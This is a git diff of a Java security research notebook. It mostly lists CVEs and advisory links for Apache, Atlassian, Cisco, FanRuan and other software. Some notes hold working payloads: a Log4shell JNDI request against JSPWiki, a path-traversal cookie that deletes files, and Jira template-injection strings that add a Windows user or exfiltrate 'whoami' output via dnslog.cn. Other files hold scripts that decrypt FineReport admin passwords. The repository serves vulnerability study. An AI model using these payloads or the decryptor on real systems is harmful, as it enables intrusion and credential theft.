diff --git a/README.md b/README.md index c990ca35..7107368b 100644 --- a/README.md +++ b/README.md @@ -1,45 +1,61 @@ > Focus on Java Security since November 1, 2021 👣 +--- + +JavaEE +``` +Servlet +JSP +JSF +Expression Language +Template Engine +JDBC +``` + +Application +``` +Apache +Atlassian +VMware +Weaver +Yonyou +Landray +``` + +Component +``` +Apache Commons JXPath +Apache Batik +UrlRewriteFilter +``` + +Framework +``` +Log +Microservice +RPC +Security +Web +``` + + +Middleware +``` +Jboss +Jetty +Resin +Tomcat +WebLogic +Wildfly +``` + +Mechanism +``` +Serialization +DataBinding +BeanValidation +``` + + -## TODO -— 任务驱动式学习路线 -- 实现xxx中间件的内存马 -- 分析xxx应用的历史漏洞 -- 阅读xxx工具的源码 -- 开发xxx功能的工具 -### 中间件 / 框架 -- [ ] Hessian -- [ ] Hibernate -- [ ] JBoss -- [ ] Jetty -- [ ] MyBatis -- [x] Resin - - [x] [内存马(filter/servlet)](https://github.com/pen4uin/JavaSec/blob/main/fileless-shell/resin/) - - [x] [漏洞分析](https://github.com/pen4uin/JavaSec/tree/main/vulnerability-analysis/resin) -- [ ] Shiro - - [x] 漏洞利用 修改key -- [ ] Struts2 -- [x] Spring - - [x] 内存马 (controller/interceptor) - - [ ] 漏洞分析 -- [ ] Tomcat - - [x] [内存马 (filter/servlet/listener/valve)](https://github.com/pen4uin/JavaSec/tree/main/fileless-shell/tomcat) -- [x] Weblogic - - [x] [内存马 (filter/listener/servlet)](https://github.com/pen4uin/JavaSec/blob/main/fileless-shell/weblogic/) - - [ ] 漏洞分析 -- [ ] WebSphere - -### 组件 / 库 / 类库 -- [ ] Fastjson -- [x] [Log4j2](https://github.com/pen4uin/JavaSec/tree/main/vulnerability-analysis/log4j2) -- [ ] XMLDecoder -- [ ] XStream -- [ ] SnakeYAML -- [ ] Jackson - -## 代码审计 -``` -希望能坚持更新到至少10+案例 👨‍💻 -``` -- [01 OFCMS](https://github.com/pen4uin/JavaSec/tree/main/code-audit/01_ofcms) diff --git a/application/apache/axis/README.md b/application/apache/axis/README.md new file mode 100644 index 00000000..8677f9e1 --- /dev/null +++ b/application/apache/axis/README.md 
@@ -0,0 +1,10 @@ +前置基础 +--- + + +相关漏洞 +--- + +- [01 Axis Rce分析](http://www.lmxspace.com/2019/07/20/Axis-Rce%E5%88%86%E6%9E%90/) +- [02 axis 1.4 AdminService未授权访问 jndi注入利用](https://xz.aliyun.com/t/7981) +- [03 攻击Axis服务的几种方式](https://www.x1a0t.com/2020/07/10/Attack-Axis-Service/) diff --git a/application/apache/cassandra/README.md b/application/apache/cassandra/README.md new file mode 100644 index 00000000..dca45cfc --- /dev/null +++ b/application/apache/cassandra/README.md @@ -0,0 +1,7 @@ +相关漏洞 +--- + +### CVE-2021-44521 RCE + +- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/ + diff --git a/application/apache/druid/README.md b/application/apache/druid/README.md new file mode 100644 index 00000000..2900d9f8 --- /dev/null +++ b/application/apache/druid/README.md @@ -0,0 +1,35 @@ + + + +### Rce via Log4shell + +根据公开的payload + +![image-20211221141800963](vulnerability-research.assets/image-20211221141800963.png) + +定位source + +``` +sodu -rn "aaa.aaa.aaa" ~/Desktop/apache-druid-0.21.1/ +``` + +![image-20211221141728711](vulnerability-research.assets/image-20211221141728711.png) + + + +![image-20211221141932644](vulnerability-research.assets/image-20211221141932644.png) + +找到 + +- org.apache.druid.server.lookup.cache.LookupCoordinatorManager + +IDEA全局 + +![image-20211221142053238](vulnerability-research.assets/image-20211221142053238.png) + +最后成功定位到source + +- org.apache.druid.server.lookup.cache.LookupCoordinatorManager#deleteTier + +![image-20211216180541227](vulnerability-research.assets/image-20211216180541227.png) + diff --git a/application/apache/druid/vulnerability-research.assets/image-20211216180541227.png b/application/apache/druid/vulnerability-research.assets/image-20211216180541227.png new file mode 100644 index 00000000..5f0eed19 Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211216180541227.png differ 
diff --git a/application/apache/druid/vulnerability-research.assets/image-20211221141728711.png b/application/apache/druid/vulnerability-research.assets/image-20211221141728711.png new file mode 100644 index 00000000..cb902ab0 Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211221141728711.png differ diff --git a/application/apache/druid/vulnerability-research.assets/image-20211221141800963.png b/application/apache/druid/vulnerability-research.assets/image-20211221141800963.png new file mode 100644 index 00000000..1f9844f6 Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211221141800963.png differ diff --git a/application/apache/druid/vulnerability-research.assets/image-20211221141932644.png b/application/apache/druid/vulnerability-research.assets/image-20211221141932644.png new file mode 100644 index 00000000..7ca903aa Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211221141932644.png differ diff --git a/application/apache/druid/vulnerability-research.assets/image-20211221142053238.png b/application/apache/druid/vulnerability-research.assets/image-20211221142053238.png new file mode 100644 index 00000000..d5d1fa61 Binary files /dev/null and b/application/apache/druid/vulnerability-research.assets/image-20211221142053238.png differ diff --git a/application/apache/felix atomos/README.md b/application/apache/felix atomos/README.md new file mode 100644 index 00000000..4bd8a5fe --- /dev/null +++ b/application/apache/felix atomos/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### GHSL-2022-007 Path Traversal + +- https://securitylab.github.com/advisories/GHSL-2022-007_Apache_Felix_Atomos/ diff --git a/application/apache/james server/README.md b/application/apache/james server/README.md new file mode 100644 index 00000000..634980eb --- /dev/null +++ b/application/apache/james server/README.md 
@@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2022-22931 Path Traversal + +- https://securitylab.github.com/advisories/GHSL-2022-002_GHSL-2022-003_Apache_James_Server/ diff --git a/application/apache/jspwiki/README.md b/application/apache/jspwiki/README.md new file mode 100644 index 00000000..60e9de1a --- /dev/null +++ b/application/apache/jspwiki/README.md 
@@ -0,0 +1,223 @@ +## 相关漏洞 +### CVE-2021-44228 Log4shell + +#### 漏洞描述 + +影响范围(已确认):v2.11.0 + +![image-20220110151507777](jspwiki.assets/image-20220110151507777.png) + + + +#### 漏洞复现 + +##### 环境搭建 + +查看仓库存在哪些版本的镜像 + +```shell +curl https://registry.hub.docker.com/v1/repositories/jspwiki/tags| tr -d '[\[\]" ]' | tr '}' '\n'| awk -F: -v image='jspwiki' '{if(NR!=NF && 3ドル != ""){printf("%s:%s\n",image,3ドル)}}' +``` + +![image-20220110150226665](jspwiki.assets/image-20220110150226665.png) + +有存在log4shell版本(v2.11.0)的镜像,拉取 + +```shell +sudo docker pull apache/jspwiki:release-2.11.0 + +# 或者 +docker pull vultarget/jspwiki_log4j_rce:2.11.0 +``` + +查看本地已经pull的镜像 + +``` +sudo docker images +``` + +![image-20220110171735060](jspwiki.assets/image-20220110171735060.png) + +启动 + +```shell +# 提前将调试端口映射出来 +sudo docker run -d -p 8080:8080 -p 5005:5005 --name jspwiki_log4shell_debug vultarget/jspwiki_log4j_rce:2.11.0 +``` + +应用首页 + +![image-20220110172151844](jspwiki.assets/image-20220110172151844.png) + + + +##### 漏洞验证 + +**proof of concept** + +``` +curl -vv http://10.10.10.139:8080/wiki/$%7Bjndi:ldap:$%7B::-/%7D/9p1lvv.dnslog.cn%7D/ +``` + +![image-20220110172050167](jspwiki.assets/image-20220110172050167.png) + + + +### CVE-2021-44140 Pre-auth 文件删除 + +#### 漏洞描述 + +https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2021-44140 + +影响范围:Apache JSPWiki up to 2.11.0.M8 + +#### 漏洞复现 + +##### 环境搭建 + +###### 基于docker + +搜索镜像 + +``` +sudo docker search jspwiki +``` + +![image-20220110142929486](jspwiki.assets/image-20220110142929486.png) + +``` +sudo docker pull vulfocus/jspwiki-cve_2021_44140 +docker run -d -p 8080:8080 --name jspwiki vulfocus/jspwiki-cve_2021_44140 +``` + +![image-20220110143652926](jspwiki.assets/image-20220110143652926.png) + +如图,成功搭建 + +![image-20220110143822970](jspwiki.assets/image-20220110143822970.png) + +``` +# 二次启动时,使用container id 即可 +sudo dokcer ps -a +sudo docker start a50359cfb0d1 + +# 进入container 内部 +sudo docker exec -it a50359cfb0d1 /bin/sh +``` + 
+![image-20220110153629595](jspwiki.assets/image-20220110153629595.png) + +配置远程调试,在/bin/catalina.sh中添加如下代码: + +``` +CATALINA_OPTS="-Xdebug -Xrunjdwp:transport=dt_socket,address=5005,suspend=n,server=y" +``` + +- address=5005: 5005为远程debug时监听的端口 + +![image-20220110154139526](jspwiki.assets/image-20220110154139526.png) + +退出,将调试端口也映射出来 + +- 为运行的container增加端口 + - https://stackoverflow.com/questions/19335444/how-do-i-assign-a-port-mapping-to-an-existing-docker-container + +``` +docker commit jspwiki jspwiki_debug +sudo docker run -p 8080:8080 -p 5005:5005 -td jspwiki_debug +``` + +本地idea测试 + +![image-20220110155734110](jspwiki.assets/image-20220110155734110.png) + +`Connected` 表示成功 + +![image-20220110155805314](jspwiki.assets/image-20220110155805314.png) + + + + + +##### 漏洞验证 + +**proof of concept** + +现在/tmp/目录下创建flag.txt + +![image-20220110161543541](jspwiki.assets/image-20220110161543541.png) + + + +```shell +Get /Logout.jsp +... +... +Cookie: JSESSIONID=xxx; JSPWikiAssertedName=xxx; JSPWikiUserPrefs=xxx;JSPWikiUID=../../../../../../../../../../../../../../../tmp/flag.txt +``` + +![image-20220110161704602](jspwiki.assets/image-20220110161704602.png) + +成功删除flag.txt + +![image-20220110161955992](jspwiki.assets/image-20220110161955992.png) + +#### 漏洞分析 + +根据漏洞名称。可以猜出漏洞点在注销处。 + +测试版本:2.11.0.M7 + +跟进 + +- logout.jsp + + 调用CookieAuthenticationLoginModule.clearLoginCookie() 删除cookie + + ![image-20220110131939248](jspwiki.assets/image-20220110131939248.png) + +- org.apache.wiki.auth.login.CookieAuthenticationLoginModule#clearLoginCookie + + ![image-20220110132101561](jspwiki.assets/image-20220110132101561.png) + +- org.apache.wiki.auth.login.CookieAuthenticationLoginModule#getLoginCookie(javax.servlet.http.HttpServletRequest) + + 存在可控参数JSPWikiUID + + ![image-20220110133028087](jspwiki.assets/image-20220110133028087.png) + + 若满足条件,则调用getCookieFile(),返回值赋值给uid + + ``` + String uid = getLoginCookie(request); + ``` + +- 
org.apache.wiki.auth.login.CookieAuthenticationLoginModule#getCookieFile + + ![image-20220110132647092](jspwiki.assets/image-20220110132647092.png) + + 创建cookieDir + + ``` + # 拼接后作为路径 + File cookieDir = new File(engine.getWorkDir(), "logincookies"); + ``` + + 若该路径不存在,则创建,执行流程走到第2个else分支 + + ``` + File file = new File(cookieDir, uid); + ``` + + 根据cookdir 和 uid 创建文件,返回值赋值给cf 。 + + 若满足条件 + + ``` + cf != null && !cf.delete() + ``` + + 则将文件cf进行删除处理 + + ![image-20220110132939245](jspwiki.assets/image-20220110132939245.png) + diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110115454715.png b/application/apache/jspwiki/jspwiki.assets/image-20220110115454715.png new file mode 100644 index 00000000..be0821f1 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110115454715.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110122150681.png b/application/apache/jspwiki/jspwiki.assets/image-20220110122150681.png new file mode 100644 index 00000000..7838f610 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110122150681.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110131939248.png b/application/apache/jspwiki/jspwiki.assets/image-20220110131939248.png new file mode 100644 index 00000000..b2457fc0 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110131939248.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110132101561.png b/application/apache/jspwiki/jspwiki.assets/image-20220110132101561.png new file mode 100644 index 00000000..244d6556 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110132101561.png differ 
diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110132402813.png b/application/apache/jspwiki/jspwiki.assets/image-20220110132402813.png new file mode 100644 index 00000000..424e852a Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110132402813.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110132647092.png b/application/apache/jspwiki/jspwiki.assets/image-20220110132647092.png new file mode 100644 index 00000000..07bbb85d Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110132647092.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110132939245.png b/application/apache/jspwiki/jspwiki.assets/image-20220110132939245.png new file mode 100644 index 00000000..bf6e6846 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110132939245.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110133028087.png b/application/apache/jspwiki/jspwiki.assets/image-20220110133028087.png new file mode 100644 index 00000000..7fa3443c Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110133028087.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110142929486.png b/application/apache/jspwiki/jspwiki.assets/image-20220110142929486.png new file mode 100644 index 00000000..9b7860ad Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110142929486.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110143652926.png b/application/apache/jspwiki/jspwiki.assets/image-20220110143652926.png new file mode 100644 index 00000000..0f7623b9 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110143652926.png differ 
diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110143822970.png b/application/apache/jspwiki/jspwiki.assets/image-20220110143822970.png new file mode 100644 index 00000000..cb1af8ba Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110143822970.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110150226665.png b/application/apache/jspwiki/jspwiki.assets/image-20220110150226665.png new file mode 100644 index 00000000..3a4dfdcc Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110150226665.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110151507777.png b/application/apache/jspwiki/jspwiki.assets/image-20220110151507777.png new file mode 100644 index 00000000..efdebabd Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110151507777.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110151828365.png b/application/apache/jspwiki/jspwiki.assets/image-20220110151828365.png new file mode 100644 index 00000000..fa203056 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110151828365.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110153629595.png b/application/apache/jspwiki/jspwiki.assets/image-20220110153629595.png new file mode 100644 index 00000000..8d65e60c Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110153629595.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110154139526.png b/application/apache/jspwiki/jspwiki.assets/image-20220110154139526.png new file mode 100644 index 00000000..e10019ef Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110154139526.png differ 
diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110155144536.png b/application/apache/jspwiki/jspwiki.assets/image-20220110155144536.png new file mode 100644 index 00000000..112e73a1 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110155144536.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110155734110.png b/application/apache/jspwiki/jspwiki.assets/image-20220110155734110.png new file mode 100644 index 00000000..f84b9649 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110155734110.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110155805314.png b/application/apache/jspwiki/jspwiki.assets/image-20220110155805314.png new file mode 100644 index 00000000..17e9d300 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110155805314.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110161543541.png b/application/apache/jspwiki/jspwiki.assets/image-20220110161543541.png new file mode 100644 index 00000000..7dc53ff8 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110161543541.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110161704602.png b/application/apache/jspwiki/jspwiki.assets/image-20220110161704602.png new file mode 100644 index 00000000..c5cf3ae3 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110161704602.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110161955992.png b/application/apache/jspwiki/jspwiki.assets/image-20220110161955992.png new file mode 100644 index 00000000..0fc5ddbc Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110161955992.png differ 
diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110171302346.png b/application/apache/jspwiki/jspwiki.assets/image-20220110171302346.png new file mode 100644 index 00000000..16107b3b Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110171302346.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110171735060.png b/application/apache/jspwiki/jspwiki.assets/image-20220110171735060.png new file mode 100644 index 00000000..4f6d52fa Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110171735060.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110172050167.png b/application/apache/jspwiki/jspwiki.assets/image-20220110172050167.png new file mode 100644 index 00000000..61b5c28d Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110172050167.png differ diff --git a/application/apache/jspwiki/jspwiki.assets/image-20220110172151844.png b/application/apache/jspwiki/jspwiki.assets/image-20220110172151844.png new file mode 100644 index 00000000..96576a59 Binary files /dev/null and b/application/apache/jspwiki/jspwiki.assets/image-20220110172151844.png differ diff --git a/application/apache/karaf/README.md b/application/apache/karaf/README.md new file mode 100644 index 00000000..f8bc1e03 --- /dev/null +++ b/application/apache/karaf/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2022-22932 Path Traversal + +- https://securitylab.github.com/advisories/GHSL-2022-005_006_Apache_Karaf/ diff --git a/application/apache/kylin/README.md b/application/apache/kylin/README.md new file mode 100644 index 00000000..71991fdd --- /dev/null +++ b/application/apache/kylin/README.md 
@@ -0,0 +1,10 @@ +相关漏洞 +--- + +### CVE-2021-45456 Command injection + +- https://securitylab.github.com/advisories/GHSL-2021-1048_GHSL-2021-1051_Apache_Kylin/ + +### CVE-2021-45458 Hardcoded credentials + +- https://securitylab.github.com/advisories/GHSL-2021-1048_GHSL-2021-1051_Apache_Kylin/ diff --git a/application/apache/olingo/README.md b/application/apache/olingo/README.md new file mode 100644 index 00000000..d4a53b9a --- /dev/null +++ b/application/apache/olingo/README.md @@ -0,0 +1,17 @@ +相关漏洞 +--- + +### CVE-2020-1925 SSRF + +- https://blog.gypsyengineer.com/en/security/cve-2020-1925-ssrf-in-apache-olingo.html + +### CVE-2019-17556 Unsafe deserialization + +- https://blog.gypsyengineer.com/en/security/cve-2019-17556-unsafe-deserialization-in-apache-olingo.html + + +### CVE-2019-17555 DoS + +- https://blog.gypsyengineer.com/en/security/cve-2019-17555-dos-via-retry-after-header-in-apache-olingo.html + + diff --git a/application/apache/pinot/README.md b/application/apache/pinot/README.md new file mode 100644 index 00000000..7f90bb5a --- /dev/null +++ b/application/apache/pinot/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### GHSL-2022-004 Path Traversal + +- https://securitylab.github.com/advisories/GHSL-2022-004_Apache_Pinot/ diff --git a/application/apache/poi/README.md b/application/apache/poi/README.md new file mode 100644 index 00000000..2916506a --- /dev/null +++ b/application/apache/poi/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2019-12415 XXE + +- https://blog.gypsyengineer.com/en/security/cve-2019-12415-xml-processing-vulnerability-in-apache-poi.html diff --git a/application/apache/solr/README.md b/application/apache/solr/README.md new file mode 100644 index 00000000..75ae8171 --- /dev/null +++ b/application/apache/solr/README.md @@ -0,0 +1,11 @@ +前置基础 +--- + +相关漏洞 +--- + + +研究利用 +--- + +https://github.com/veracode-research/solr-injection 
diff --git a/application/apache/storm/README.md b/application/apache/storm/README.md new file mode 100644 index 00000000..59feaf3a --- /dev/null +++ b/application/apache/storm/README.md @@ -0,0 +1,10 @@ +相关漏洞 +--- + +### CVE-2021-40865 Unsafe Deserialization + +- https://securitylab.github.com/advisories/GHSL-2021-086-apache-storm/ + +### CVE-2021-38294 Command injection + +- https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/ diff --git a/application/atlassian/bitbucket/README.md b/application/atlassian/bitbucket/README.md new file mode 100644 index 00000000..5855e2b0 --- /dev/null +++ b/application/atlassian/bitbucket/README.md @@ -0,0 +1,5 @@ +相关漏洞 + +- [ ] CVE-2019-3397 Path Travel -> RCE + + diff --git a/application/atlassian/confluence/README.md b/application/atlassian/confluence/README.md new file mode 100644 index 00000000..34f87426 --- /dev/null +++ b/application/atlassian/confluence/README.md @@ -0,0 +1,6 @@ +相关漏洞 + +- [x] [CVE-2022-26134 OGNL -> RCE](https://pen4uin.github.io/post/22-10-03-confluence-el-injection-via-ognl/) +- [ ] CVE-2021-26084 OGNL -> RCE +- [ ] CVE-2019-3396 Velocity SSTi=I -> RCE/File Read +- [x] [CVE-2020-4027 SSTI -> RCE](https://pen4uin.github.io/post/22-10-01-confluence-ssti-via-velocity/) \ No newline at end of file diff --git a/application/atlassian/crowd/README.md b/application/atlassian/crowd/README.md new file mode 100644 index 00000000..269cd393 --- /dev/null +++ b/application/atlassian/crowd/README.md @@ -0,0 +1,3 @@ +相关漏洞 + +- [ ] CVE-2019-11580 RCE \ No newline at end of file diff --git a/application/atlassian/jira/CVE-2019-11581.md b/application/atlassian/jira/CVE-2019-11581.md new file mode 100644 index 00000000..f724d75f --- /dev/null +++ b/application/atlassian/jira/CVE-2019-11581.md 
@@ -0,0 +1,60 @@ +#### 漏洞描述 + +影响版本 +``` +4.4.x +5.x.x +6.x.x +7.0.x、7.1.x、7.2.x、7.3.x、7.4.x、7.5.x、7.6.x before 7.6.14 (the fixed version for 7.6.x)、7.7.x、7.8.x、7.9.x、7.10.x、7.11.x、7.12.x、7.13.x before 7.13.5 (the fixed version for 7.13.x) +8.0.x before 8.0.3 (the fixed version for 8.0.x)、8.1.x before 8.1.2 (the fixed version for 8.1.x)、8.2.x before 8.2.3 (the fixed version for 8.2.x) +``` + +### 漏洞复现 + +#### 漏洞验证 + +漏洞利用 + +> https://github.com/jas502n/CVE-2019-11581 + +确认未登陆状态下漏洞的存在 + +访问如下URL(无需管理员账户权限): + +http://10.10.10.12:8080/secure/ContactAdministrators!default.jspa + +![image-20210919113350954](img/image-20210919113350954-16322839765956.png) + +在Subject填入payload + +针对不同目标操作系统的验证 + +- Windows +- Linux + +##### Windows 利用 + +添加用户 + +``` +$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user neo 1qaz@WSX3edc /add').waitFor() +``` + +##### Linux 利用 + +登陆管理员账号,然后访问如下URL: + +/secure/admin/SendBulkMail!default.jspa + +``` +# dnslog query +$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://uz09sm.dnslog.cn').waitFor() + +# dnslog 外带命令执行结果 示例:whoami +$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('ping `whoami`.vniyj2.dnslog.cn').waitFor() +``` + +dnslog query + +![image-20210919120024420](img/image-20210919120024420.png) + diff --git a/application/atlassian/jira/README.md b/application/atlassian/jira/README.md new file mode 100644 index 00000000..8399a250 --- /dev/null +++ b/application/atlassian/jira/README.md @@ -0,0 +1,2 @@ +相关漏洞 +- [x] [CVE-2019-11581 SSTI -> RCE](CVE-2019-11581.md) \ No newline at end of file 
diff --git a/application/atlassian/jira/img/image-20210919113350954-16322839765956.png b/application/atlassian/jira/img/image-20210919113350954-16322839765956.png new file mode 100644 index 00000000..58b8b123 Binary files /dev/null and b/application/atlassian/jira/img/image-20210919113350954-16322839765956.png differ diff --git a/application/atlassian/jira/img/image-20210919120024420.png b/application/atlassian/jira/img/image-20210919120024420.png new file mode 100644 index 00000000..b45fe4ab Binary files /dev/null and b/application/atlassian/jira/img/image-20210919120024420.png differ diff --git a/application/cisco/asdm/README.md b/application/cisco/asdm/README.md new file mode 100644 index 00000000..1ece7360 --- /dev/null +++ b/application/cisco/asdm/README.md @@ -0,0 +1,4 @@ +相关漏洞 + +- [ ] CVE-2021-1585 RCE + diff --git a/application/cisco/hyperflex hx/README.md b/application/cisco/hyperflex hx/README.md new file mode 100644 index 00000000..dae85a3d --- /dev/null +++ b/application/cisco/hyperflex hx/README.md @@ -0,0 +1,8 @@ +相关漏洞 + +- [ ] CVE-2021-1497 Command Injection +- [ ] CVE-2021-1498 Command Injection +- [ ] CVE-2021-1499 File Upload + + + diff --git a/application/citrix/xenmobile/README.md b/application/citrix/xenmobile/README.md new file mode 100644 index 00000000..1fe2d113 --- /dev/null +++ b/application/citrix/xenmobile/README.md @@ -0,0 +1,4 @@ +相关漏洞 + +- [ ] CVE-2021-44228 Path Traversal +- [x] [CVE-2020-8209 Path Traversal](https://mp.weixin.qq.com/s/tZXp1zTlfas7makYcgZusw) \ No newline at end of file diff --git a/application/f5/README.md b/application/f5/README.md new file mode 100644 index 00000000..970c22a5 --- /dev/null +++ b/application/f5/README.md @@ -0,0 +1,4 @@ +相关漏洞 + +- [ ] CVE-2020-5902 RCE + diff --git a/application/fanruan/README.md b/application/fanruan/README.md new file mode 100644 index 00000000..fd335139 --- /dev/null +++ b/application/fanruan/README.md 
@@ -0,0 +1,3 @@ +历史漏洞 + +- [ ] CNVD-2021-34467 v9 文件上传 \ No newline at end of file diff --git a/application/fanruan/code/X-FineReport.jar b/application/fanruan/code/X-FineReport.jar new file mode 100644 index 00000000..22b8f795 Binary files /dev/null and b/application/fanruan/code/X-FineReport.jar differ diff --git a/application/fanruan/code/X-FineReport.java b/application/fanruan/code/X-FineReport.java new file mode 100644 index 00000000..68c89bc0 --- /dev/null +++ b/application/fanruan/code/X-FineReport.java 
@@ -0,0 +1,57 @@ +package code; + +public class FineReport { + private static final int[] PASSWORD_MASK_ARRAY = new int[]{19, 78, 10, 15, 100, 213, 43, 23}; + public static String passwordEncode(String paramString) { + final StringBuilder sb = new StringBuilder(); + sb.append("___"); + int n = 0; + for (int i = 0; i < paramString.length(); ++i) { + if (n == PASSWORD_MASK_ARRAY.length) { + n = 0; + } + String s2 = Integer.toHexString(paramString.charAt(i) ^ PASSWORD_MASK_ARRAY[n]); + for (int length = s2.length(), j = 0; j < 4 - length; ++j) { + s2 = "0" + s2; + } + sb.append(s2); + ++n; + } + return sb.toString(); + } + + private static String passwordDecode(String paramString) { + if (paramString != null && paramString.startsWith("___")) { + paramString = paramString.substring(3); + StringBuilder sb = new StringBuilder(); + int i = 0; + for (int j = 0; j <= paramString.length() - 4; j += 4) { + if (i == PASSWORD_MASK_ARRAY.length) { + i = 0; + } + String str = paramString.substring(j, j + 4); + int k = Integer.parseInt(str, 16) ^ PASSWORD_MASK_ARRAY[i]; + sb.append((char) k); + ++i; + } + paramString = sb.toString(); + } + return paramString; + } + + public static void main(String[] args) { + if (args.length < 2) { + System.out.println("Usage:"); + System.out.println("FineReportX.jar --encode admin"); + System.out.println("FineReportX.jar --decode ___0072002a00670066000a00e400190024"); + } else { + if ("--encode".equals(args[0])) { + String pass = passwordEncode(args[1]); + System.out.println(pass); + } else if ("--decode".equals(args[0])) { + String pass = passwordDecode(args[1]); + System.out.println(pass); + } + } + } +} diff --git a/application/fanruan/code/fineReport-decrypt.py b/application/fanruan/code/fineReport-decrypt.py new file mode 100644 index 00000000..d18e6633 --- /dev/null +++ b/application/fanruan/code/fineReport-decrypt.py 
@@ -0,0 +1,9 @@ +cipher = input("输入密文:\n") # 密文 +PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] +password = "" +cipher = cipher[3:] +for i in range(int(len(cipher) / 4)): + c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16) + c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8] + password = password + chr(c2) +print("明文密码:\n"+password) diff --git "a/application/fanruan/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/fanruan/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..aa056d6b --- /dev/null +++ "b/application/fanruan/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,32 @@ + +### 密码解密 + +> python + +密码配置文件 +``` +\WEB-INF\resources\privilege.xml +``` +获取加密后的密文 + +![image](https://user-images.githubusercontent.com/55024146/129508186-d55dace1-7218-4dd9-9848-b33c842e1005.png) + +反编译jar包获取加密代码逻辑 + +![image](https://user-images.githubusercontent.com/55024146/129508634-ee7e2498-e31f-49d9-a77c-e14a60794b9c.png) + + +解密脚本 +![image](https://user-images.githubusercontent.com/55024146/159114641-26d5a937-b5e7-4f0d-bb44-cf5864279c05.png) + + +> java + +- 获取加解密逻辑姿势同上 + +```shell +java -jar .\X-code.FineReport.jar --encode pen4uin +java -jar .\X-code.FineReport.jar --decode ___0063002b0064003b001100bc0045 +``` + +![image](https://user-images.githubusercontent.com/55024146/159114652-70a84da5-327a-4b2d-8077-bb18aef87a2c.png) diff --git "a/application/h3c/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/h3c/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..acfef1eb --- /dev/null +++ "b/application/h3c/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,4 @@ +利用研究 +--- + +- [IMC数据库解密 from t00ls](https://www.t00ls.com/articles-66252.html) diff --git a/application/ibm/README.md b/application/ibm/README.md new file mode 100644 index 00000000..caaf7345 --- /dev/null +++ 